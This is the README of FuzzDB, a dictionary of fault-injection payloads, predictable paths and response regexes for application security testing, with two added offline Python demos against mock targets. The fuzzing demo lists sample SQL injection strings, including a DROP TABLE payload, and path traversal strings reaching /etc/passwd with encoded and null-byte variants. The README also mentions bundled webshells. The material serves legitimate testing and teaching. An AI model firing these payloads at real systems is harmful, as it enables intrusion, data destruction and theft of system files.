FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.
**Attack Patterns -**
FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing.
These patterns, categorized by attack and, where appropriate, platform type, are known to cause issues like OS command injection, directory listings, directory traversal, source exposure, file upload bypass, authentication bypass, XSS, HTTP header CRLF injection, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte, and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs that [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).
**Discovery -**
The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths).
FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.
https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery
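The discovery wordlists are only half of a forced-browsing check; the other half is telling a real hit apart from a server that answers 200 to everything. The following is an added example, not code from the FuzzDB project (which ships wordlists, not tools). The path list is a constructed excerpt in FuzzDB's one-entry-per-line layout, and `mock_server` is a constructed stand-in for a target with a soft-404 page, so it runs offline; on an engagement you would load `discovery/predictable-filepaths/...` and replace `mock_server` with an HTTP request.

```python
import hashlib
import secrets

# Constructed excerpt in the one-path-per-line format of FuzzDB's
# discovery/predictable-filepaths wordlists (illustrative, not the real files).
PREDICTABLE_PATHS = """/admin/
/backup.zip
/.git/HEAD
/phpinfo.php
/server-status
/logs/access.log
"""


def load_wordlist(text):
    """One entry per line, blank lines dropped (FuzzDB file layout)."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def mock_server(path):
    """Constructed stand-in for a target that answers 200 for everything,
    echoing the requested path into a 'not found' page (a soft 404)."""
    known = {
        "/admin/": (401, "<h1>Authorization Required</h1>"),
        "/.git/HEAD": (200, "ref: refs/heads/master\n"),
        "/phpinfo.php": (200, "<title>phpinfo()</title><h1>PHP Version 7.4.3</h1>"),
    }
    if path in known:
        return known[path]
    return 200, f"<h1>Page not found</h1><p>There is no page at {path}.</p>"


def fingerprint(path, status, body):
    """Hash the response with the requested path blanked out, so soft-404
    pages that echo the URL still collapse to a single fingerprint."""
    normalised = body.replace(path, "{PATH}")
    return status, hashlib.sha256(normalised.encode()).hexdigest()


def soft404_baseline(fetch, samples=3):
    """Fingerprint the server's answer to random paths that cannot exist."""
    prints = set()
    for _ in range(samples):
        bogus = "/" + secrets.token_hex(8)
        status, body = fetch(bogus)
        prints.add(fingerprint(bogus, status, body))
    return prints


def naive_status_filter(fetch, wordlist_text):
    """What a status-code-only brute forcer reports against this server."""
    return [p for p in load_wordlist(wordlist_text) if fetch(p)[0] != 404]


def forced_browse(fetch, wordlist_text):
    """Request each predictable path; keep only responses whose fingerprint
    differs from the soft-404 baseline. Returns [(path, status, body_length)]."""
    baseline = soft404_baseline(fetch)
    hits = []
    for path in load_wordlist(wordlist_text):
        status, body = fetch(path)
        if fingerprint(path, status, body) in baseline:
            continue
        hits.append((path, status, len(body)))
    return hits


if __name__ == "__main__":
    print("status-only:", naive_status_filter(mock_server, PREDICTABLE_PATHS))
    print("baselined:  ", forced_browse(mock_server, PREDICTABLE_PATHS))
```

Against this mock the status-code-only pass reports all six paths, while the baselined pass reports only `/admin/`, `/.git/HEAD` and `/phpinfo.php`. Hashing the whole body is deliberately strict; servers that embed timestamps or nonces in error pages need a looser comparison (length bucket or a similarity ratio) in `fingerprint`.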
**Response Analysis -**
Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex).
FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.
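The attack payloads above and the response regexes here are meant to be used together: inject each payload, then grep every response for the signatures that betray a bug. The harness below is an added example, not code from FuzzDB or its author. The two wordlists are constructed imitations of `attack/` entries in FuzzDB's one-payload-per-line format, the regexes are constructed in the style of the `regex/` files, and `mock_target` is a constructed stand-in for a vulnerable endpoint (an unparameterised SQL query plus a C-style file open that stops at a NUL byte) so the whole thing runs offline. For real use, read the actual files from `attack/` and `regex/` and replace `mock_target` with an HTTP request.

```python
import re
from urllib.parse import quote, unquote

# Constructed payload lists in FuzzDB's one-payload-per-line format.
# They imitate attack/sql-injection and attack/path-traversal entries
# and are not copied from the real files.
SQLI_WORDLIST = """'
' OR '1'='1
1; DROP TABLE users--
"""
TRAVERSAL_WORDLIST = """../../../../etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../etc/passwd%00.png
"""

# Constructed response signatures in the spirit of regex/errors.txt:
# name -> regex that marks a response as interesting.
RESPONSE_PATTERNS = {
    "mysql-error": re.compile(r"You have an error in your SQL syntax", re.I),
    "unix-passwd": re.compile(r"^root:[x*]?:0:0:", re.M),
}


def load_wordlist(text):
    """Parse a FuzzDB-style wordlist: one payload per line, blank lines dropped."""
    return [line for line in text.splitlines() if line.strip()]


def mock_target(raw_value):
    """Constructed stand-in for an HTTP endpoint (no network). It URL-decodes
    the parameter once, as a web server would, then behaves like two classic
    bugs: string-built SQL, and a C-style open() that truncates at NUL."""
    value = unquote(raw_value)
    if "'" in value:
        return 500, "You have an error in your SQL syntax; check the manual"
    path = value.split("\x00", 1)[0]  # NUL ends the filename, dropping '.png'
    if path.startswith("../") and path.endswith("/etc/passwd"):
        return 200, "root:x:0:0:root:/root:/bin/bash\n"
    return 200, "<html>ok</html>"


def fuzz_param(target, payloads, patterns):
    """Send every payload both raw and URL-encoded, and report each response
    that matches a signature. Returns [(payload, encoding, status, pattern)]."""
    findings = []
    for payload in payloads:
        for encoding, sent in (("raw", payload), ("urlenc", quote(payload, safe=""))):
            status, body = target(sent)
            for name, rx in patterns.items():
                if rx.search(body):
                    findings.append((payload, encoding, status, name))
    return findings


def run_demo():
    payloads = load_wordlist(SQLI_WORDLIST) + load_wordlist(TRAVERSAL_WORDLIST)
    return fuzz_param(mock_target, payloads, RESPONSE_PATTERNS)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Sending each payload in more than one encoding matters: the pre-encoded `..%2f` and `%00` entries only work when sent raw, because encoding them again turns `%` into `%25` and the server's single decode never produces the slash or the NUL. That is why FuzzDB carries both plain and encoded variants of the same primitive.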
**Other useful stuff -**
Webshells in different languages, common password and username lists, and some handy wordlists.
**Documentation -**
Many directories contain a README.md file with usage notes.
A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included.
### Usage tips for pentesting with FuzzDB ###
https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints
### How people use FuzzDB ###
FuzzDB is like an application security scanner, without the scanner.
Some ways to use FuzzDB:
* Website and application service black-box penetration testing with
  * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension
  * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner
  * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy
* To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more
* Inside custom tools for testing software and application protocols
* Crafting security test cases for GUI or command line software with standard test automation tools
* Incorporating into other Open Source software or commercial products
* In training materials and documentation
* To learn about software exploitation techniques
* To improve your security testing product or service
### How were the patterns collected? ###
Many, many hours of research and pentesting. And
* analysis of default app installs
* analysis of system and application documentation
* analysis of error messages
* researching old web exploits for repeatable attack strings
* scraping scanner payloads from http logs
* various books, articles, blog posts, mailing list threads
* other open source fuzzers and pentest tools
and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors
### Places you can find FuzzDB ###
Other security tools and projects that incorporate FuzzDB in whole or in part:
* OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* SecLists https://github.com/danielmiessler/SecLists
* TrustedSec Pentesters Framework https://github.com/trustedsec/ptf
* Rapid7 Metasploit https://github.com/rapid7/metasploit-framework
* Portswigger Burp Suite http://portswigger.net
* Protofuzz https://github.com/trailofbits/protofuzz
* BlackArch Linux https://www.blackarch.org/
* ArchStrike Linux https://archstrike.org/
### Download ###
**Preferred method is to check out sources via git, new payloads are added frequently**
```
git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
```
While in the FuzzDB dir, you can update your local repo with the command
```
git pull
```
This Stack Overflow answer gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595
You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)
Note: Some antivirus/antimalware software will alert on FuzzDB (the webshells in particular). To resolve this, whitelist the repository's file path. Nothing in FuzzDB can harm your computer as-is; however, because the repository contains webshells, it is not recommended to store it on a web server or other important system, where a local file include or a misconfigured document root could turn those files into a working backdoor. Use at your own risk.
### Who ###
FuzzDB was created by Adam Muntner (amuntner @ gmail.com)
FuzzDB (c) Copyright Adam Muntner, 2010-2019
Portions copyrighted by others, as noted in commit comments and README.md files.
FuzzDB is licensed under the New BSD license and Creative Commons Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool; send me an email and let me know.
Submissions are always welcome!
Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/)